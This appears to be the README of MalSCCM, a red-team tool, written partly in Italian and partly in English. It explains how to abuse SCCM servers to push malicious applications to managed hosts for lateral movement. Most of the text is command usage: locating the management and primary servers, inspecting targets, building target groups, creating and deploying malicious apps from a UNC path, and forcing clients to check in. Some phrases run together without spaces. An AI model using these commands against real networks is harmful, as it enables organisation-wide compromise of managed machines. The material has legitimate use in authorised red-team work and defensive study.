
Abusare dei server SCCM per distribuire applicazioni dannose agli host gestiti per movimenti laterali e operazioni di red team.
Questo strumento permette di abusare di server SCCM locali o remoti per distribuire applicazioni dannose agli host che gestiscono. Per utilizzare questo strumento, il processo corrente deve avere diritti di amministrazione sul server SCCM.
Tipicamente, le distribuzioni di SCCM hanno il server di gestione e il server primario sullo stesso host; in tal caso, l'host restituito dal comando locate può essere utilizzato come server primario.
Se così non fosse, sarà necessario compromettere l'host di gestione restituito da locate per poter eseguire nuovamente locate su quell'host e ottenere il nome host del server primario. Una volta ottenuto quello e l'accesso amministrativo, si è pronti per procedere!
Per maggiori informazioni sull'uso dello strumento, fare riferimento al blog qui sotto.
Un enorme ringraziamento a PowerSCCM (https://github.com/PowerShellMafia/PowerSCCM) su cui tutto questo si basa; questo non sarebbe stato possibile senza il lavoro di @harmj0y, @jaredcatkinson, @enigma0x3, @mattifestation.
locate per trovare il server di gestionelocate per trovare il server primarioinspect sul server primario per vedere chi si può prendere di miraCommands listed below have optional parameters in <>.
Attempt to find the SCCM management and primary servers:
MalSCCM.exe locate
Inspect the primary server to gather SCCM information:
MalSCCM.exe inspect </server:PrimarySiteHostname> </all /computers /deployments /groups /applications /forest /packages /primaryusers>
Create/Modify/Delete Groups to add targets in for deploying malicious apps. Groups can either be for devices or users:
MalSCCM.exe group /create /groupname:example /grouptype:[user|device] </server:PrimarySiteHostname>
MalSCCM.exe group /delete /groupname:example </server:PrimarySiteHostname>
MalSCCM.exe group /addhost /groupname:example /host:examplehost </server:PrimarySiteHostname>
MalSCCM.exe group /adduser /groupname:example /user:exampleuser </server:PrimarySiteHostname>
Create/Deploy/Delete malicious applications:
MalSCCM.exe app /create /name:appname /uncpath:""\\unc\path"" </server:PrimarySiteHostname>
MalSCCM.exe app /delete /name:appname </server:PrimarySiteHostname>
MalSCCM.exe app /deploy /name:appname /groupname:example /assignmentname:example2 </server:PrimarySiteHostname>
MalSCCM.exe app /deletedeploy /name:appname </server:PrimarySiteHostname>
MalSCCM.exe app /cleanup /name:appname </server:PrimarySiteHostname>
Force devices of a group to checkin within a couple minutes:
MalSCCM.exe checkin /groupname:example </server:PrimarySiteHostname>